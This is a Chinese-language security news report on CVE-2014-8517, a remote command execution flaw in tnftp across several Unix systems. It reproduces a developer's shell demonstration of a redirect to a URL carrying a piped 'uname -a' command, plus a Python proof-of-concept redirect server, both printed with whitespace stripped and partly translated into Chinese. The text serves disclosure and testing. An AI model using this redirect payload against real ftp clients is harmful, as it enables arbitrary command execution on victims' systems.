10月28日,一封公开邮件中暴露了一个FTP远程命令执行漏洞。该漏洞影响的Unix系统包括:Fedora、Debian、NetBSD、FreeBSD、OpenBSD,甚至苹果的OSX操作系统***版本Yosemite10.10。NetBSD开发者(JaredMcNeill)确认该漏洞可以通过tnftp从WEB服务器远程执行恶意命令,该漏洞编号为CVE-2014-8517:a20$pwd/var/www/cgi-bina20$ls-l总共4-rwxr-xr-x1rootwheel159Oct1402:02redirect-rwxr-xr-x1rootwheel178Oct1401:54uname-aa20$catredirect#!/bin/shecho'Status:302Found'echo'Content-Type:text/html'echo'Connection:keep-alive'echo'Location:http://192.168.2.19/cgi-bin/uname%20-a'echoa20$a20$ftphttp://localhost/cgi-bin/redirectTrying::1:80...ftp:无法连接到`::1:80':连接被拒绝尝试127.0.0.1:80...请求http://localhost/cgi-bin/redirect重定向到http://192.168.2.19/cgi-bin/|uname%20-a请求http://192.168.2.19/cgi-bin/|uname%20-a32101.46KiB/s32字节在00:00(78.51KiB/s)NetBSDa207.99.1NetBSD7.99.1(CUBIEBOARD)#113:SunOct2612:05:36ADT2014Jared()Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIEBOARDevbarma20$漏洞范围及公告Debian,RedHat,Gentoo,Novell(SuSELinux),DragonFly,FreeBSD、OpenBSD、Apple等系统开发者已经意识到这个漏洞的危害,其中Debian、RedHat、Gnetoo和Novell都发布了漏洞通知:漏洞检测脚本(请勿用于非法用途)并且你应该看到commandexecuted.Allwrongsreversed-@stevelord"""importBaseHTTPServerimportsysimportsocketimporturllibhostname=socket.getfqdn()#SetthistoyourIPifyouhavenoFQDNport=8000#Setthistotheportyouwanttorunthisoncmd="uname-a;echo您可能不应该执行来自Internet的随机代码。只是说。"cmd=urllib.quote(cmd)redir="http://"+hostname+":"+str(port)+"/cgi-bin/|"+cmdclassRedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):defdo_GET(s):ifcmdins.path:s.send_response(200)s.end_headers()else:s.send_response(302)s.send_header("Location",redir)s.end_headers()if__name__=="__main__":print"redirectingto,",redirserver_class=BaseHTTPServer.HTTPServerhttpd=server_class((hostname,port),RedirectHandler)try:httpd.serve_forever()print"开始服务。"除了KeyboardInterrupt:passhttpd.server_close()print"\nStoppedserving."解决方案和更详细的内容见http://seclists.org/oss-sec/2014/q4/459http://seclists.org/oss-sec/2014/q4/464http://seclists.org/oss-sec/2014/q4/460参考信息来源:http://www.securityweek.com/nix-systems-affected-ftp-remote-command-execution-vulnerability
